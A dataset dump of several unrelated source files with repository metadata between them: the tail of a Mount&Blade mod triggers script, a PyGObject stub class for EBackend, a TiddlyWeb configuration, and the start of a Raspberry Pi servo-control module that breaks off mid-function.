# (party_set_ai_behavior, ":quest_target_party", ai_bhvr_hold),
# (party_set_flags, ":quest_target_party", pf_default_behavior, 0),
# (try_end),
]),
(1, 0.0, ti_once, [
# (check_quest_active, "qst_escort_merchant_caravan"),
# (eq, "$escort_merchant_caravan_mode", 0),
],
[
# (quest_get_slot, ":quest_target_party", "qst_escort_merchant_caravan", slot_quest_target_party),
# (try_begin),
# (party_is_active, ":quest_target_party"),
# (party_set_ai_behavior, ":quest_target_party", ai_bhvr_escort_party),
# (party_set_flags, ":quest_target_party", pf_default_behavior, 0),
# (party_set_ai_object, ":quest_target_party", "p_main_party"),
# (try_end),
]),
(0.3, 0, 1.1, [
(check_quest_active, "qst_escort_merchant_caravan"),
(quest_get_slot, ":quest_target_party", "qst_escort_merchant_caravan", slot_quest_target_party),
(neg|party_is_active,":quest_target_party"),
],
[
(call_script, "script_abort_quest", "qst_escort_merchant_caravan", 2),
]),
# Troublesome bandits
(0.3, 0.0, 1.1, [(check_quest_active, "qst_troublesome_bandits"),
(neg|check_quest_failed, "qst_troublesome_bandits"),
(store_num_parties_destroyed, ":cur_eliminated", "pt_troublesome_bandits"),
(lt, "$qst_troublesome_bandits_eliminated", ":cur_eliminated"),
(store_num_parties_destroyed_by_player, ":cur_eliminated_by_player", "pt_troublesome_bandits"),
(eq, ":cur_eliminated_by_player", "$qst_troublesome_bandits_eliminated_by_player"),
],
[(display_message, "str_bandits_eliminated_by_another"),
(call_script, "script_abort_quest", "qst_troublesome_bandits", 0),
]),
(0.3, 0.0, 1.1, [(check_quest_active, "qst_troublesome_bandits"),
(neg|check_quest_succeeded, "qst_troublesome_bandits"),
(store_num_parties_destroyed, ":cur_eliminated", "pt_troublesome_bandits"),
(lt, "$qst_troublesome_bandits_eliminated", ":cur_eliminated"),
(store_num_parties_destroyed_by_player, ":cur_eliminated_by_player", "pt_troublesome_bandits"),
(neq, ":cur_eliminated_by_player", "$qst_troublesome_bandits_eliminated_by_player"),
],
[(call_script, "script_succeed_quest", "qst_troublesome_bandits"),]),
# Kidnapped girl:
(1, 0, 0,
[(check_quest_active, "qst_kidnapped_girl"),
(quest_get_slot, ":quest_target_party", "qst_kidnapped_girl", slot_quest_target_party),
(party_is_active, ":quest_target_party"),
(party_is_in_any_town, ":quest_target_party"),
(remove_party, ":quest_target_party"),
],
[]
),
#Rebellion changes begin
#move
(0, 0, 24 * 14,
[
(try_for_range, ":pretender", pretenders_begin, pretenders_end),
(troop_set_slot, ":pretender", slot_troop_cur_center, 0),
(neq, ":pretender", "$supported_pretender"),
(troop_get_slot, ":target_faction", ":pretender", slot_troop_original_faction),
(faction_slot_eq, ":target_faction", slot_faction_state, sfs_active),
(faction_slot_eq, ":target_faction", slot_faction_has_rebellion_chance, 1),
(neg|troop_slot_eq, ":pretender", slot_troop_occupation, slto_kingdom_hero),
(try_for_range, ":unused", 0, 30),
(troop_slot_eq, ":pretender", slot_troop_cur_center, 0),
(store_random_in_range, ":town", towns_begin, towns_end),
(store_faction_of_party, ":town_faction", ":town"),
(store_relation, ":relation", ":town_faction", ":target_faction"),
(le, ":relation", 0), #fail if nothing qualifies
(troop_set_slot, ":pretender", slot_troop_cur_center, ":town"),
(try_begin),
(eq, "$cheat_mode", 1),
(str_store_troop_name, 4, ":pretender"),
(str_store_party_name, 5, ":town"),
(display_message, "@{!}{s4} is in {s5}"),
(try_end),
(try_end),
# (try_for_range, ":rebel_faction", rebel_factions_begin, rebel_factions_end),
# (faction_get_slot, ":rebellion_status", ":rebel_faction", slot_faction_state),
# (eq, ":rebellion_status", sfs_inactive_rebellion),
# (faction_get_slot, ":pretender", ":rebel_faction", slot_faction_leader),
# (faction_get_slot, ":target_faction", ":rebel_faction", slot_faction_rebellion_target),#
# (store_random_in_range, ":town", towns_begin, towns_end),
# (store_faction_of_party, ":town_faction", ":town"),
# (store_relation, ":relation", ":town_faction", ":target_faction"),
# (le, ":relation", 0), #fail if nothing qualifies
# (faction_set_slot, ":rebel_faction", slot_faction_inactive_leader_location, ":town"),
(try_end),
],
[]
),
#Rebellion changes end
#NPC system changes begin
#Move unemployed NPCs around taverns
(24 * 15 , 0, 0,
[
(call_script, "script_update_companion_candidates_in_taverns"),
],
[]
),
#Process morale and determine personality clashes
(0, 0, 24,
[],
[
#Count NPCs in party and get the "grievance divisor", which determines how fast grievances go away
#Set their relation to the player
(assign, ":npcs_in_party", 0),
(assign, ":grievance_divisor", 100),
(try_for_range, ":npc1", companions_begin, companions_end),
(main_party_has_troop, ":npc1"),
(val_add, ":npcs_in_party", 1),
(try_end),
(val_sub, ":grievance_divisor", ":npcs_in_party"),
(store_skill_level, ":persuasion_level", "skl_persuasion", "trp_player"),
(val_add, ":grievance_divisor", ":persuasion_level"),
(assign, reg7, ":grievance_divisor"),
# (display_message, "@{!}Process NPC changes. GD: {reg7}"),
##Activate personality clash from 24 hours ago
(try_begin), #scheduled personality clashes require at least 24hrs together
(gt, "$personality_clash_after_24_hrs", 0),
(eq, "$disable_npc_complaints", 0),
(try_begin),
(troop_get_slot, ":other_npc", "$personality_clash_after_24_hrs", slot_troop_personalityclash_object),
(main_party_has_troop, "$personality_clash_after_24_hrs"),
(main_party_has_troop, ":other_npc"),
(assign, "$npc_with_personality_clash", "$personality_clash_after_24_hrs"),
(try_end),
(assign, "$personality_clash_after_24_hrs", 0),
(try_end),
#
(try_for_range, ":npc", companions_begin, companions_end),
###Reset meeting variables
(troop_set_slot, ":npc", slot_troop_turned_down_twice, 0),
(try_begin),
(troop_slot_eq, ":npc", slot_troop_met, 1),
(troop_set_slot, ":npc", slot_troop_met_previously, 1),
(try_end),
###Check for coming out of retirement
(troop_get_slot, ":occupation", ":npc", slot_troop_occupation),
(try_begin),
(eq, ":occupation", slto_retirement),
(troop_get_slot, ":renown_min", ":npc", slot_troop_return_renown),
(str_store_troop_name, s31, ":npc"),
(troop_get_slot, ":player_renown", "trp_player", slot_troop_renown),
(assign, reg4, ":player_renown"),
(assign, reg5, ":renown_min"),
# (display_message, "@{!}Test {s31} for retirement return {reg4}, {reg5}."),
(gt, ":player_renown", ":renown_min"),
(troop_set_slot, ":npc", slot_troop_personalityclash_penalties, 0),
(troop_set_slot, ":npc", slot_troop_morality_penalties, 0),
(troop_set_slot, ":npc", slot_troop_occupation, 0),
(try_end),
#Check for political issues
(try_begin), #does npc's opponent pipe up?
(troop_slot_ge, ":npc", slot_troop_days_on_mission, 5),
(troop_slot_eq, ":npc", slot_troop_current_mission, npc_mission_kingsupport),
(troop_get_slot, ":other_npc", ":npc", slot_troop_kingsupport_opponent),
(troop_slot_eq, ":other_npc", slot_troop_kingsupport_objection_state, 0),
(troop_set_slot, ":other_npc", slot_troop_kingsupport_objection_state, 1),
(str_store_troop_name, s3, ":npc"),
(str_store_troop_name, s4, ":other_npc"),
(try_begin),
(eq, "$cheat_mode", 1),
(display_message, "str_s4_ready_to_voice_objection_to_s3s_mission_if_in_party"),
(try_end),
(try_end),
#Check for quitting
(try_begin),
(main_party_has_troop, ":npc"),
(call_script, "script_dplmc_npc_morale", ":npc", 0), #SB : just the number
(assign, ":npc_morale", reg0),
(try_begin),
(lt, ":npc_morale", 20),
(store_random_in_range, ":random", 0, 100),
(val_add, ":npc_morale", ":random"),
(lt, ":npc_morale", 20),
(assign, "$npc_is_quitting", ":npc"),
(try_end),
#Reduce grievance over time (or augment, if party is overcrowded
(troop_get_slot, ":grievance", ":npc", slot_troop_personalityclash_penalties),
(val_mul, ":grievance", 90),
(val_div, ":grievance", ":grievance_divisor"),
(troop_set_slot, ":npc", slot_troop_personalityclash_penalties, ":grievance"),
(troop_get_slot, ":grievance", ":npc", slot_troop_morality_penalties),
(val_mul, ":grievance", 90),
(val_div, ":grievance", ":grievance_divisor"),
(troop_set_slot, ":npc", slot_troop_morality_penalties, ":grievance"),
#Change personality grievance levels
(try_begin),
(this_or_next|troop_slot_ge, ":npc", slot_troop_personalityclash_state, 1),
(eq, "$disable_npc_complaints", 1),
(troop_get_slot, ":object", ":npc", slot_troop_personalityclash_object),
(main_party_has_troop, ":object"),
(call_script, "script_reduce_companion_morale_for_clash", ":npc", ":object", slot_troop_personalityclash_state),
(try_end),
(try_begin),
(this_or_next|troop_slot_ge, ":npc", slot_troop_personalityclash2_state, 1),
(eq, "$disable_npc_complaints", 1),
(troop_get_slot, ":object", ":npc", slot_troop_personalityclash2_object),
(main_party_has_troop, ":object"),
(call_script, "script_reduce_companion_morale_for_clash", ":npc", ":object", slot_troop_personalityclash2_state),
(try_end),
(try_begin),
(this_or_next|troop_slot_ge, ":npc", slot_troop_personalitymatch_state, 1),
(eq, "$disable_npc_complaints", 1),
(troop_get_slot, ":object", ":npc", slot_troop_personalitymatch_object),
(main_party_has_troop, ":object"),
(troop_get_slot, ":grievance", ":npc", slot_troop_personalityclash_penalties),
(val_mul, ":grievance", 9),
(val_div, ":grievance", 10),
(troop_set_slot, ":npc", slot_troop_personalityclash_penalties, ":grievance"),
(try_end),
#Check for new personality clashes
#Active personality clash 1 if at least 24 hours have passed
(try_begin),
(eq, "$disable_npc_complaints", 0),
(eq, "$npc_with_personality_clash", 0),
(eq, "$npc_with_personality_clash_2", 0),
(eq, "$personality_clash_after_24_hrs", 0),
(troop_slot_eq, ":npc", slot_troop_personalityclash_state, 0),
(troop_get_slot, ":other_npc", ":npc", slot_troop_personalityclash_object),
(main_party_has_troop, ":other_npc"),
(assign, "$personality_clash_after_24_hrs", ":npc"),
(try_end),
#Personality clash 2 and personality match is triggered by battles
(try_begin),
(eq, "$npc_with_political_grievance", 0),
(troop_slot_eq, ":npc", slot_troop_kingsupport_objection_state, 1),
(assign, "$npc_with_political_grievance", ":npc"),
(try_end),
#main party does not have troop, and the troop is a companion
(else_try),
(neg|main_party_has_troop, ":npc"),
(eq, ":occupation", slto_player_companion),
(troop_get_slot, ":days_on_mission", ":npc", slot_troop_days_on_mission),
(try_begin), #debug
(eq, "$cheat_mode", 1),
(str_store_troop_name, s10, ":npc"),
(assign, reg0, ":days_on_mission"),
(display_message, "@Checking rejoin of {s10} days on mission: {reg0}"),
(try_end),
(try_begin),
(gt, ":days_on_mission", 0),
(val_sub, ":days_on_mission", 1),
(troop_set_slot, ":npc", slot_troop_days_on_mission, ":days_on_mission"),
##diplomacy begin
(else_try),
(this_or_next|troop_slot_eq, ":npc", slot_troop_current_mission, dplmc_npc_mission_spy_request), #spy mission
(troop_slot_eq, ":npc", slot_troop_current_mission, dplmc_npc_mission_rescue_prisoner), #SB : escue mission
(troop_slot_ge, ":npc", dplmc_slot_troop_mission_diplomacy, 1), #caught
(try_begin), #use hired blade for spy
(troop_slot_eq, ":npc", slot_troop_current_mission, dplmc_npc_mission_spy_request),
(troop_set_slot, "trp_hired_blade", slot_troop_mission_object, ":npc"),
(assign, "$npc_to_rejoin_party", "trp_hired_blade"),
(else_try), #use town walker
(troop_slot_eq, ":npc", slot_troop_current_mission, dplmc_npc_mission_rescue_prisoner),
(troop_get_slot, ":town_no", ":npc", slot_troop_town_with_contacts),
(store_random_in_range, ":slot_no", slot_center_walker_0_troop, slot_center_walker_0_troop + num_town_walkers),
(party_get_slot, ":walker_no", ":town_no", ":slot_no"),
(troop_set_slot, ":walker_no", slot_troop_mission_object, ":npc"),
(assign, "$npc_to_rejoin_party", ":walker_no"),
(try_end),
##diplomacy end
(else_try),
(troop_slot_ge, ":npc", slot_troop_current_mission, 1),
#If the hero can join
(this_or_next|neg|troop_slot_eq, ":npc", slot_troop_current_mission, npc_mission_rejoin_when_possible),
(hero_can_join, ":npc"),
(assign, "$npc_to_rejoin_party", ":npc"),
(try_end),
(try_end),
(try_end),
]),
#NPC system changes end
#SB : change interval
# Lady of the lake achievement
(12, 0, 0,
[
# (troop_get_type, ":is_female", "trp_player"),
(eq, "$character_gender", tf_female),
],
[
(assign, ":inv_cap", companions_end),
(try_for_range, ":companion", companions_begin, ":inv_cap"),
(troop_slot_eq, ":companion", slot_troop_occupation, slto_player_companion),
# (troop_get_inventory_capacity, ":inv_cap", ":companion"),
(try_for_range, ":i_slot", 0, ek_head),
(troop_get_inventory_slot, ":item_id", ":companion", ":i_slot"),
(ge, ":item_id", 0),
(this_or_next|eq, ":item_id", "itm_great_sword"),
(this_or_next|eq, ":item_id", "itm_sword_two_handed_a"),
(eq, ":item_id", "itm_strange_great_sword"),
(unlock_achievement, ACHIEVEMENT_LADY_OF_THE_LAKE),
(assign, ":inv_cap", 0),
(try_end),
(try_end),
]
),
##diplomacy begin
# Appoint chamberlain
(24 , 0, 24 * 12,
[],
[
(assign, ":has_fief", 0),
(try_for_range, ":center_no", centers_begin, centers_end),
(party_get_slot, ":lord_troop_id", ":center_no", slot_town_lord),
(eq, ":lord_troop_id", "trp_player"),
(assign, ":has_fief", 1),
(try_end),
(eq, ":has_fief", 1),
(try_begin), #debug
(eq, "$cheat_mode", 1),
(assign, reg0, "$g_player_chamberlain"),
(display_message, "@{!}DEBUG : chamberlain: {reg0}"),
(try_end),
(assign, ":notification", 0),
(try_begin),
(eq, "$g_player_chamberlain", 0),
(assign, ":notification", 1),
(else_try),
(neq, "$g_player_chamberlain", -1),
(neq, "$g_player_chamberlain", "trp_dplmc_chamberlain"),
(assign, ":notification", 1),
(try_end),
(try_begin),
(eq, ":notification", 1),
(call_script, "script_add_notification_menu", "mnu_dplmc_notification_appoint_chamberlain", 0, 0),
(try_end),]
),
# Appoint constable
(24 , 0, 24 * 13,
[],
[
(assign, ":has_fief", 0),
(try_for_range, ":center_no", walled_centers_begin, walled_centers_end),
(party_get_slot, ":lord_troop_id", ":center_no", slot_town_lord),
(eq, ":lord_troop_id", "trp_player"),
(assign, ":has_fief", 1),
(try_end),
(eq, ":has_fief", 1),
(try_begin), #debug
(eq, "$cheat_mode", 1),
(assign, reg0, "$g_player_constable"),
(display_message, "@{!}DEBUG : constable: {reg0}"),
(try_end),
(assign, ":notification", 0),
(try_begin),
(eq, "$g_player_constable", 0),
(assign, ":notification", 1),
(else_try),
(neq, "$g_player_constable", -1),
(neq, "$g_player_constable", "trp_dplmc_constable"),
(assign, ":notification", 1),
(try_end),
(try_begin),
(eq, ":notification", 1),
(call_script, "script_add_notification_menu", "mnu_dplmc_notification_appoint_constable", 0, 0),
(try_end),
]
),
# Appoint chancellor
(24 , 0, 24 * 14,
[],
[
(assign, ":has_fief", 0),
(try_for_range, ":center_no", towns_begin, towns_end),
(party_get_slot, ":lord_troop_id", ":center_no", slot_town_lord),
(eq, ":lord_troop_id", "trp_player"),
(assign, ":has_fief", 1),
(try_end),
(eq, ":has_fief", 1),
(try_begin), #debug
(eq, "$cheat_mode", 1),
(assign, reg0, "$g_player_chancellor"),
(display_message, "@{!}DEBUG : chancellor: {reg0}"),
(try_end),
(assign, ":notification", 0),
(try_begin),
(eq, "$g_player_chancellor", 0),
(assign, ":notification", 1),
(else_try),
(neq, "$g_player_chancellor", -1),
(neq, "$g_player_chancellor", "trp_dplmc_chancellor"),
(assign, ":notification", 1),
(try_end),
(try_begin),
(eq, ":notification", 1),
(call_script, "script_add_notification_menu", "mnu_dplmc_notification_appoint_chancellor", 0, 0),
(try_end),
]),
#initialize autoloot feature if you have a chamberlain
##diplomacy start+
#Disable this: autoloot gets initialized elsewhere.
(24, 0, ti_once,
[
##NEW:
(eq, 0, 1),
##OLD:
#(store_skill_level, ":inv_skill", "skl_inventory_management", "trp_player"),
#(gt, "$g_player_chamberlain", 0),
#(ge, ":inv_skill", 3),
],
[
##NEW:
#This doesn't ever get called, but if it did here's what should happen"
(call_script, "script_dplmc_initialize_autoloot", 1),#argument "1" forces this to make changes
##OLD:
#(call_script, "script_dplmc_init_item_difficulties"),
#(call_script, "script_dplmc_init_item_base_score"),
#(assign, "$g_autoloot", 1),
]),
(0.1, 0.5, 0, [(map_free,0),(eq,"$g_move_fast", 1)], [(assign,"$g_move_fast", 0)]),
##diplomacy end
#Zaitenko's Reinforcement Script
(36, 0, 0.0, [], [ ## Set the reinforcements interval to 36 Game hours. Change as you feel like.
(try_for_range, ":center", walled_centers_begin, walled_centers_end),
(store_faction_of_party, ":faction", ":center"),
(party_get_num_companions, ":garrison", ":center"),
(faction_get_slot, ":party_template_a", ":faction", slot_faction_reinforcements_a),
(faction_get_slot, ":party_template_b", ":faction", slot_faction_reinforcements_b),
(faction_get_slot, ":party_template_c", ":faction", slot_faction_reinforcements_c),
(assign, ":party_template", 0),
(try_begin),
(party_slot_eq, ":center", slot_party_type, spt_town),
(lt, ":garrison", 200), ## Under this number of troops will towns get reinforcements
(assign, ":party_template", "pt_reinforcements"),
(else_try),
(party_slot_eq, ":center", slot_party_type, spt_castle),
(lt, ":garrison", 70), ## Under this number of troops will castles get reinforcements
(assign, ":party_template", "pt_reinforcements"),
(try_end),
(try_begin),
(gt, ":party_template", 0),
(try_for_range, ":village_reinforcements", villages_begin, villages_end),
(try_begin),
(party_slot_eq, ":center", slot_party_type, spt_castle), ## For Castles
(party_slot_eq, ":village_reinforcements", slot_village_bound_center, ":center"),
(party_slot_eq, ":village_reinforcements", slot_village_state, svs_normal), ## Not if the village is being raided or is looted
(spawn_around_party, ":village_reinforcements", ":party_template"),
(assign, ":result", reg0),
(store_random_in_range, ":rand", 0, 100),
(try_begin),
(is_between, ":rand", 0, 45), ## Get weakest template
(party_add_template, ":result", ":party_template_a"),
(else_try),
(is_between, ":rand", 45, 85), ## Get stronger template
(party_add_template, ":result", ":party_template_b"),
(else_try),
(ge, ":rand", 85), ## Get strongest template
(party_add_template, ":result", ":party_template_c"),
(try_end),
(party_set_faction, ":result", ":faction"),
(party_set_slot, ":result", slot_party_type, spt_reinforcement_party),
(party_set_slot, ":result", slot_party_ai_object, ":center"),
(str_store_party_name, s14, ":village_reinforcements"),
(party_set_name, ":result", "@Reinforcements from {s14}"),
(party_set_ai_behavior,":result",ai_bhvr_travel_to_party),
(party_set_ai_object,":result", ":center"),
(party_set_flags, ":result", pf_default_behavior, 1),
(else_try),
(party_slot_eq, ":center", slot_party_type, spt_town), ## For Towns
(party_slot_eq, ":village_reinforcements", slot_village_bound_center, ":center"),
(party_slot_eq, ":village_reinforcements", slot_village_state, svs_normal), ## Not if the village is being raided or is looted
(neg|party_slot_eq, ":center", slot_town_lord, "trp_player"), ## Not a player owned center
(spawn_around_party, ":village_reinforcements", ":party_template"),
(assign, ":result", reg0),
(store_random_in_range, ":rand", 0, 100),
(try_begin),
(is_between, ":rand", 0, 45), ## Get weakest template
(party_add_template, ":result", ":party_template_a"),
(else_try),
(is_between, ":rand", 40, 85), ## Get stronger template
(party_add_template, ":result", ":party_template_b"),
(else_try),
(ge, ":rand", 85), ## Get strongest template
(party_add_template, ":result", ":party_template_c"),
(try_end),
(party_set_faction, ":result", ":faction"),
(party_set_slot, ":result", slot_party_type, spt_reinforcement_party),
(party_set_slot, ":result", slot_party_ai_object, ":center"),
(str_store_party_name, s14, ":village_reinforcements"),
(party_set_name, ":result", "@Reinforcements from {s14}"),
(party_set_ai_behavior,":result",ai_bhvr_travel_to_party),
(party_set_ai_object,":result", ":center"),
(party_set_flags, ":result", pf_default_behavior, 1),
(try_end),
(try_end),
(try_end),
(try_end)])
]
# modmerger_start version=201 type=2
# ModMerger integration point: hands this module's `triggers` list to
# modmerge() so other mod components can splice their own triggers in at
# module-system build time.
try:
    # NOTE(review): component_name is assigned but not used locally --
    # presumably read by modmerger through the caller's namespace; confirm.
    component_name = "triggers"
    var_set = { "triggers" : triggers }
    from modmerger import modmerge
    modmerge(var_set)
except:
    raise  # bare re-raise: surfaces any merge failure unchanged
# modmerger_end
| [
"lily.metaxas@gmail.com"
] | lily.metaxas@gmail.com |
66e0c84a835d00f66e63f4eabefe603562658452 | f82757475ea13965581c2147ff57123b361c5d62 | /gi-stubs/repository/EBackend/CollectionBackendClass.py | 9bef82e9cc16e52ae4c3acc39b19c2255df0443e | [] | no_license | ttys3/pygobject-stubs | 9b15d1b473db06f47e5ffba5ad0a31d6d1becb57 | d0e6e93399212aada4386d2ce80344eb9a31db48 | refs/heads/master | 2022-09-23T12:58:44.526554 | 2020-06-06T04:15:00 | 2020-06-06T04:15:00 | 269,693,287 | 8 | 2 | null | 2020-06-05T15:57:54 | 2020-06-05T15:57:54 | null | UTF-8 | Python | false | false | 6,476 | py | # encoding: utf-8
# module gi.repository.EBackend
# from /usr/lib64/girepository-1.0/EBackend-1.2.typelib
# by generator 1.147
"""
An object which wraps an introspection typelib.
This wrapping creates a python module like representation of the typelib
using gi repository as a foundation. Accessing attributes of the module
will dynamically pull them in and create wrappers for the members.
These members are then cached on this introspection module.
"""
# imports
import gi as __gi
import gi.overrides.GObject as __gi_overrides_GObject
import gi.repository.EDataServer as __gi_repository_EDataServer
import gi.repository.Gio as __gi_repository_Gio
import gobject as __gobject
class CollectionBackendClass(__gi.Struct):
"""
:Constructors:
::
CollectionBackendClass()
"""
def __delattr__(self, *args, **kwargs): # real signature unknown
""" Implement delattr(self, name). """
pass
def __dir__(self, *args, **kwargs): # real signature unknown
""" Default dir() implementation. """
pass
def __eq__(self, *args, **kwargs): # real signature unknown
""" Return self==value. """
pass
def __format__(self, *args, **kwargs): # real signature unknown
""" Default object formatter. """
pass
def __getattribute__(self, *args, **kwargs): # real signature unknown
""" Return getattr(self, name). """
pass
def __ge__(self, *args, **kwargs): # real signature unknown
""" Return self>=value. """
pass
def __gt__(self, *args, **kwargs): # real signature unknown
""" Return self>value. """
pass
def __hash__(self, *args, **kwargs): # real signature unknown
""" Return hash(self). """
pass
def __init_subclass__(self, *args, **kwargs): # real signature unknown
"""
This method is called when a class is subclassed.
The default implementation does nothing. It may be
overridden to extend subclasses.
"""
pass
def __init__(self): # real signature unknown; restored from __doc__
pass
def __le__(self, *args, **kwargs): # real signature unknown
""" Return self<=value. """
pass
def __lt__(self, *args, **kwargs): # real signature unknown
""" Return self<value. """
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
def __ne__(self, *args, **kwargs): # real signature unknown
""" Return self!=value. """
pass
def __reduce_ex__(self, *args, **kwargs): # real signature unknown
""" Helper for pickle. """
pass
def __reduce__(self, *args, **kwargs): # real signature unknown
""" Helper for pickle. """
pass
def __repr__(self, *args, **kwargs): # real signature unknown
""" Return repr(self). """
pass
def __setattr__(self, *args, **kwargs): # real signature unknown
""" Implement setattr(self, name, value). """
pass
def __sizeof__(self, *args, **kwargs): # real signature unknown
""" Size of object in memory, in bytes. """
pass
def __str__(self, *args, **kwargs): # real signature unknown
""" Return str(self). """
pass
def __subclasshook__(self, *args, **kwargs): # real signature unknown
"""
Abstract classes can override this to customize issubclass().
This is invoked early on by abc.ABCMeta.__subclasscheck__().
It should return True, False or NotImplemented. If it returns
NotImplemented, the normal algorithm is used. Otherwise, it
overrides the normal algorithm (and the outcome is cached).
"""
pass
def __weakref__(self, *args, **kwargs): # real signature unknown
pass
child_added = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
child_removed = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
create_resource = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
create_resource_finish = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
create_resource_sync = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
delete_resource = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
delete_resource_finish = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
delete_resource_sync = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
dup_resource_id = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
parent_class = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
populate = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
reserved = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
__class__ = None # (!) real value is "<class 'gi.types.StructMeta'>"
__dict__ = None # (!) real value is "mappingproxy({'__info__': StructInfo(CollectionBackendClass), '__module__': 'gi.repository.EBackend', '__gtype__': <GType void (4)>, '__dict__': <attribute '__dict__' of 'CollectionBackendClass' objects>, '__weakref__': <attribute '__weakref__' of 'CollectionBackendClass' objects>, '__doc__': None, 'parent_class': <property object at 0x7f9dc2d881d0>, 'populate': <property object at 0x7f9dc2d882c0>, 'dup_resource_id': <property object at 0x7f9dc2d883b0>, 'child_added': <property object at 0x7f9dc2d884a0>, 'child_removed': <property object at 0x7f9dc2d88590>, 'create_resource_sync': <property object at 0x7f9dc2d886d0>, 'create_resource': <property object at 0x7f9dc2d88770>, 'create_resource_finish': <property object at 0x7f9dc2d888b0>, 'delete_resource_sync': <property object at 0x7f9dc2d889a0>, 'delete_resource': <property object at 0x7f9dc2d88a40>, 'delete_resource_finish': <property object at 0x7f9dc2d88b80>, 'reserved': <property object at 0x7f9dc2d88c20>})"
__gtype__ = None # (!) real value is '<GType void (4)>'
__info__ = StructInfo(CollectionBackendClass)
| [
"ttys3@outlook.com"
] | ttys3@outlook.com |
4ab6db4ddd15683d5486a6ce5d4a368545640938 | 4a1ce8dc34b771334867fc8f3eacf9eb140c7a15 | /contributors/ChrisDent/verticals/UnaForms/uf/tiddlywebconfig.py | 60e4c4e51b404a2059c5c1f646e909fabd4ca5fc | [] | no_license | dineshkummarc/tiddlywiki-svn-mirror | 4bbfbd22ba150f90543b983b3875dd30ad8abe4e | e1d4198d99f143d4a836d42e6c9b88891f2b6798 | refs/heads/master | 2021-01-20T01:25:05.375480 | 2010-12-08T16:12:00 | 2010-12-08T16:12:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 859 | py | config = {
    # Plugins loaded by the TiddlyWeb server (presumably per-request; confirm).
    'system_plugins': ['former', 'logout'],
    # Plugins exposed to the `twanager` command-line tool.
    'twanager_plugins': ['former', 'lister'],
    # (bag name, tiddler source URIs) pairs seeded into a fresh instance.
    'instance_tiddlers': [
        ('system', [
            'http://svn.tiddlywiki.org/Trunk/association/adaptors/TiddlyWebAdaptor.js',
            'http://svn.tiddlywiki.org/Trunk/association/plugins/ServerSideSavingPlugin.js',
            'http://svn.tiddlywiki.org/Trunk/association/plugins/TiddlyWebConfig.js',
            'http://svn.tiddlywiki.org/Trunk/contributors/SaqImtiaz/verticals/unaforms/unaformsSetDefaultBagPlugin.js'
        ]),
        ('formtools', [
            'http://svn.tiddlywiki.org/Trunk/contributors/SaqImtiaz/verticals/InputExForms/inputEx-subrecipe.recipe',
        ])
    ],
    'log_level': 'DEBUG',
    'css_uri': 'http://peermore.com/tiddlyweb.css',
}
| [
"cdent@bb0f57cd-c710-0410-a8fb-e8bc1be0d679"
] | cdent@bb0f57cd-c710-0410-a8fb-e8bc1be0d679 |
d9db690c91fc2ddc09d2c0a1a3de68d70af49ae3 | c608832b2e4c731722d43d5fc579a56634bcc219 | /GUI/servomodule.py | b22a01c7a2863bd87778dfec57522e6faaad11b7 | [] | no_license | neiltarar/GUI-Controlled-Self-Driving-Robot-Car-Project | 09277109a466e36d2e6707cbdb5d16ac5e4b3e56 | c133145eb33c4846e33230a7e75441b3782bcaab | refs/heads/master | 2023-06-24T07:32:59.390109 | 2023-06-11T08:51:30 | 2023-06-11T08:51:30 | 247,864,115 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,682 | py | # servomodule.py
import RPi.GPIO as GPIO
import time
def servo_down():
    """Tilt the camera servo downward, then stop driving both servos.

    Sets up both servo pins, holds an 8% duty cycle on the tilt servo
    (BCM 4) for 0.5 s, then zeroes both duty cycles so the servos are no
    longer actively driven. Fix: removed the dead ``if True:`` wrapper
    around the movement block (always-true conditional).
    """
    servoPIN_1 = 18  # pan servo pin -- driven by the left/right functions
    servoPIN_2 = 4   # tilt servo pin (BCM numbering)
    GPIO.setmode(GPIO.BCM)
    GPIO.setup(servoPIN_1, GPIO.OUT)
    GPIO.setup(servoPIN_2, GPIO.OUT)
    p_1 = GPIO.PWM(servoPIN_1, 50)  # GPIO 18 for PWM with 50Hz
    p_1.start(6)  # Initialisation at the centre duty cycle
    p_2 = GPIO.PWM(servoPIN_2, 50)
    p_2.start(5)
    p_1.ChangeDutyCycle(0)
    p_2.ChangeDutyCycle(0)
    p_2.ChangeDutyCycle(8)  # 8% duty cycle == 'down' position
    time.sleep(0.5)         # give the servo time to travel
    p_1.ChangeDutyCycle(0)  # zero duty -> stop actively driving
    p_2.ChangeDutyCycle(0)
def servo_up():
    """Tilt the camera servo upward, then stop driving both servos.

    Holds a 3.5% duty cycle on the tilt servo (BCM 4) for 0.5 s, then
    zeroes both duty cycles. Fix: removed the dead ``if True:`` wrapper
    around the movement block (always-true conditional).
    """
    servoPIN_1 = 18  # pan servo pin -- driven by the left/right functions
    servoPIN_2 = 4   # tilt servo pin (BCM numbering)
    GPIO.setmode(GPIO.BCM)
    GPIO.setup(servoPIN_1, GPIO.OUT)
    GPIO.setup(servoPIN_2, GPIO.OUT)
    p_1 = GPIO.PWM(servoPIN_1, 50)  # GPIO 18 for PWM with 50Hz
    p_1.start(6)  # Initialisation at the centre duty cycle
    p_2 = GPIO.PWM(servoPIN_2, 50)
    p_2.start(5)
    p_1.ChangeDutyCycle(0)
    p_2.ChangeDutyCycle(0)
    p_2.ChangeDutyCycle(3.5)  # 3.5% duty cycle == 'up' position
    time.sleep(0.5)           # give the servo time to travel
    p_1.ChangeDutyCycle(0)    # zero duty -> stop actively driving
    p_2.ChangeDutyCycle(0)
def servo_centre():
    """Return both pan and tilt servos to their centre positions.

    Holds the centre duty cycles (6% pan, 5% tilt) for 0.5 s, then zeroes
    both duty cycles so the servos stop being actively driven. Fix:
    removed the dead ``if True:`` wrapper (always-true conditional).
    """
    servoPIN_1 = 18  # pan servo pin (BCM numbering)
    servoPIN_2 = 4   # tilt servo pin (BCM numbering)
    GPIO.setmode(GPIO.BCM)
